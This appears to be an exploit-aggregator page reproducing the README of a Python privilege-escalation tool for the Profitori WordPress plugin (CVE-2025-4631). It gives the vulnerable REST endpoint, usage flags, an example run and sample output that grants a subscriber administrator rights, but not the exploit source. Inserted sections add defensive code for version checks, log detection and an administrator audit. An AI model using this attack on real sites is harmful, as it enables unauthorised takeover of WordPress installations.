## https://sploitus.com/exploit?id=EDDBE825-8084-5420-9BDA-4EFD4FDF5E1B
## 🚨 CVE-2025-4631 - Profitori WordPress Plugin Privilege Escalation Exploit

### 📌 Vulnerability Summary
**Profitori Plugin (versions 2.0.6.0 to 2.1.1.3)** is vulnerable to **unauthenticated privilege escalation** due to a missing capability check in the `/wp-json/stocktend/v1/stocktend_object` endpoint. This allows remote attackers to escalate the privileges of existing users (or create new ones) by directly manipulating the `wp_capabilities` meta field.

- **CVE**: CVE-2025-4631
- **CVSS Score**: 9.8 (Critical)
- **Published**: May 30, 2025
- **Last Updated**: May 31, 2025

---

## πŸ› οΈ What This Script Does
This Python exploit automates the privilege escalation process by:

1. ✅ Checking the plugin version via the `readme.txt` file.
2. 🚀 Exploiting the vulnerable REST API endpoint if a vulnerable version is detected.
3. 📡 Sending the payload to escalate a user's privileges to Administrator.
4. 🧾 Printing formatted, detailed results including the modified user's credentials.

If the version check fails, the exploit proceeds cautiously with a warning.
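The same two facts the script relies on (the affected version range and the REST route) are what a site owner needs for a quick self-assessment and for log review. The following is an added defensive example, not part of the exploit or the plugin: it reads the `Stable tag:` line of a plugin `readme.txt`, tests it against the 2.0.6.0 to 2.1.1.3 range stated above, and flags access-log lines that reach the `stocktend_object` route, including the `?rest_route=` form WordPress serves when pretty permalinks are off. The readme text and log lines are constructed samples.

```python
import re
from typing import Iterable, List, Optional, Tuple
from urllib.parse import unquote

# Range given in the advisory above: Profitori 2.0.6.0 through 2.1.1.3, inclusive.
VULN_MIN: Tuple[int, ...] = (2, 0, 6, 0)
VULN_MAX: Tuple[int, ...] = (2, 1, 1, 3)
# REST route named in the advisory; /wp-json is the pretty-permalink prefix.
ENDPOINT = "/wp-json/stocktend/v1/stocktend_object"
REST_ROUTE = ENDPOINT[len("/wp-json"):]  # "/stocktend/v1/stocktend_object"


def parse_version(version: str) -> Tuple[int, ...]:
    """Turn '2.1.1.3' into (2, 1, 1, 3); shorter versions are zero-padded so
    '2.1.2' compares as (2, 1, 2, 0)."""
    parts = [int(p) for p in version.strip().split(".") if p.isdigit()]
    return tuple(parts + [0] * (4 - len(parts)))[:4]


def version_from_readme(readme_text: str) -> Optional[str]:
    """Pull the 'Stable tag:' value out of a plugin readme.txt (the same file the
    exploit reads); returns None if the line is absent."""
    match = re.search(r"^Stable tag:\s*([\d.]+)", readme_text, re.MULTILINE | re.IGNORECASE)
    return match.group(1) if match else None


def is_vulnerable(version: str) -> bool:
    """True when the installed version falls inside the affected range."""
    return VULN_MIN <= parse_version(version) <= VULN_MAX


# Apache/nginx combined log format; only ip, timestamp, method, path and status are used.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def targets_endpoint(path: str) -> bool:
    """True if a request path reaches the stocktend_object route, either through
    /wp-json/... or through the ?rest_route=... fallback."""
    base, _, query = path.partition("?")
    if base.rstrip("/").endswith(ENDPOINT):
        return True
    return f"rest_route={REST_ROUTE}" in unquote(query)


def flag_endpoint_requests(lines: Iterable[str]) -> List[dict]:
    """Return one record per log line that hits the vulnerable route."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and targets_endpoint(m.group("path")):
            hits.append({"ip": m.group("ip"), "time": m.group("ts"),
                         "method": m.group("method"), "status": int(m.group("status"))})
    return hits


# Constructed sample inputs (not real site data).
SAMPLE_README = """=== Profitori ===
Stable tag: 2.1.1.3
Requires at least: 5.0
"""

SAMPLE_LOG = [
    '203.0.113.7 - - [30/May/2025:10:12:01 +0000] "GET /wp-content/plugins/profitori/readme.txt HTTP/1.1" 200 1834',
    '203.0.113.7 - - [30/May/2025:10:12:04 +0000] "POST /wp-json/stocktend/v1/stocktend_object HTTP/1.1" 200 512',
    '198.51.100.2 - - [30/May/2025:10:15:22 +0000] "GET /index.php?rest_route=%2Fstocktend%2Fv1%2Fstocktend_object HTTP/1.1" 200 77',
    '192.0.2.9 - - [30/May/2025:10:16:00 +0000] "GET /wp-json/wp/v2/posts HTTP/1.1" 200 9021',
]

if __name__ == "__main__":
    version = version_from_readme(SAMPLE_README)
    state = "VULNERABLE" if version and is_vulnerable(version) else "not in affected range"
    print(f"installed version {version}: {state}")
    for hit in flag_endpoint_requests(SAMPLE_LOG):
        print(f"{hit['time']} {hit['ip']} {hit['method']} -> {ENDPOINT} ({hit['status']})")
```

A `readme.txt` fetch followed within seconds by a request to the route from the same address, as in the constructed log, is the sequence the script's own steps 1 and 2 produce and is worth alerting on; on a site that does not use Profitori's REST API from the public internet, any hit on this route is suspicious.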

---

## 📸 Exploit Proof
![Proof of Concept](./nxploit_poc.PNG)

---

## 💻 Usage
```bash
usage: CVE-2025-4631.py [-h] -u URL -id ID [--email EMAIL] [--name NAME] [--url_field URL_FIELD] [--verbose]
```

### Example:
```bash
python CVE-2025-4631.py -u http://nxploit.ddev.site -id 3
```

### Sample Output:
```
[📄] Checking plugin version at: http://nxploit.ddev.site/wp-content/plugins/profitori/readme.txt
[✅] Vulnerable version detected: 2.1.1.3
[🚀] Exploiting in 3 seconds...
[📡] Sending privilege escalation request to: http://nxploit.ddev.site/wp-json/stocktend/v1/stocktend_object
[🎯] Exploit completed successfully!

[🧾] Updated User Information:
--------------------------------------
🆔 User ID         : 3
👤 Username        : subscriber
📧 Email           : subscriber@example.com
🪪 Display Name    : Subscriber User
🔗 User URL        : 
🛑 Role Raw        : a:1:{s:13:"administrator";b:1;}

[👑] Exploit By : Nxploited (Khaled_alenazi)
🔗 GitHub       : https://github.com/Nxploited
📧 Email        : NxploitBot@gmal.com
```
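The `Role Raw` line above is the PHP-serialized `wp_capabilities` usermeta value after escalation, and it is the artifact a responder should audit across all users after suspected exploitation. The following added example (defensive code, not from the exploit or the plugin) decodes that serialized form, extracts the roles that are switched on, and reports any user holding `administrator` who is not on an expected-admin list. The user rows are constructed samples; the SQL in the comment is the standard WordPress schema query that would supply them on a real site.

```python
from typing import Iterable, List, Set, Tuple

# Roles whose presence in wp_capabilities should always be explainable.
PRIVILEGED_ROLES = {"administrator"}


class _Reader:
    """Cursor over a PHP-serialized string."""

    def __init__(self, text: str) -> None:
        self.s = text
        self.i = 0

    def take(self, token: str) -> None:
        if not self.s.startswith(token, self.i):
            raise ValueError(f"expected {token!r} at offset {self.i}")
        self.i += len(token)

    def read_until(self, stop: str) -> str:
        end = self.s.index(stop, self.i)
        out = self.s[self.i:end]
        self.i = end + 1
        return out


def _parse_value(r: _Reader):
    """Parse one serialized value. Covers the types WordPress uses in
    wp_capabilities: a (array), s (string), b (bool), i (int)."""
    tag = r.s[r.i]
    r.take(tag + ":")
    if tag == "s":
        length = int(r.read_until(":"))
        r.take('"')
        value = r.s[r.i:r.i + length]
        r.i += length
        r.take('";')
        return value
    if tag == "b":
        return r.read_until(";") == "1"
    if tag == "i":
        return int(r.read_until(";"))
    if tag == "a":
        count = int(r.read_until(":"))
        r.take("{")
        items = {}
        for _ in range(count):
            key = _parse_value(r)
            items[key] = _parse_value(r)
        r.take("}")
        return items
    raise ValueError(f"unsupported type tag {tag!r} at offset {r.i}")


def parse_wp_capabilities(serialized: str) -> dict:
    """Decode a wp_capabilities value such as a:1:{s:13:"administrator";b:1;}."""
    r = _Reader(serialized.strip())
    value = _parse_value(r)
    if r.i != len(r.s):
        raise ValueError("trailing data after serialized array")
    if not isinstance(value, dict):
        raise ValueError("wp_capabilities must be a serialized array")
    return value


def granted_roles(serialized: str) -> Set[str]:
    """Roles whose flag is true; a role set to b:0 is not granted."""
    return {role for role, on in parse_wp_capabilities(serialized).items() if on is True}


def audit_users(rows: Iterable[Tuple[int, str, str]], expected_admins: Set[str]) -> List[dict]:
    """Report every user holding a privileged role who is not on the expected list.
    rows are (ID, user_login, wp_capabilities); on a real site they come from
      SELECT u.ID, u.user_login, m.meta_value FROM wp_users u
      JOIN wp_usermeta m ON m.user_id = u.ID WHERE m.meta_key = 'wp_capabilities';
    (replace the wp_ prefix with the site's own table prefix)."""
    findings = []
    for user_id, login, caps in rows:
        roles = granted_roles(caps)
        if roles & PRIVILEGED_ROLES and login not in expected_admins:
            findings.append({"user_id": user_id, "user_login": login, "roles": sorted(roles)})
    return findings


# Constructed sample rows; row 3 carries the same Role Raw value as the sample output above.
SAMPLE_ROWS = [
    (1, "admin", 'a:1:{s:13:"administrator";b:1;}'),
    (2, "editor", 'a:1:{s:6:"editor";b:1;}'),
    (3, "subscriber", 'a:1:{s:13:"administrator";b:1;}'),
]

if __name__ == "__main__":
    for f in audit_users(SAMPLE_ROWS, expected_admins={"admin"}):
        print(f"unexpected privileged user: ID {f['user_id']} ({f['user_login']}) roles={f['roles']}")
```

Because the exploit writes the meta value directly rather than going through WordPress's role API, the `user_login` and `display_name` of the escalated account are unchanged; comparing `wp_capabilities` against a known-good list is more reliable than looking for new accounts alone.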

---

## βš™οΈ Script Arguments
| Flag               | Description                                      | Required |
|--------------------|--------------------------------------------------|----------|
| `-u`, `--url`       | 🌐 Base URL of the WordPress site               | βœ… Yes   |
| `-id`               | πŸ†” ID of the user to escalate                   | βœ… Yes   |
| `--email`           | πŸ“§ Fake email to display                        | ❌ No    |
| `--name`            | πŸ‘€ Display name                                 | ❌ No    |
| `--url_field`       | πŸ”— User URL field                               | ❌ No    |
| `--verbose`         | πŸ” Print full JSON response                     | ❌ No    |

---

## 📂 Requirements
- Python 3.x
- `requests` library

Install via:
```bash
pip install requests
```

---

## ⚠️ Disclaimer
This tool is provided for **educational and authorized testing purposes only**. Any misuse of this exploit against systems you do not own or have explicit permission to test is **strictly prohibited**. The creator is not responsible for any damages or legal consequences arising from improper usage.

---

*BY: Nxploited ( Khaled_Alenazi )*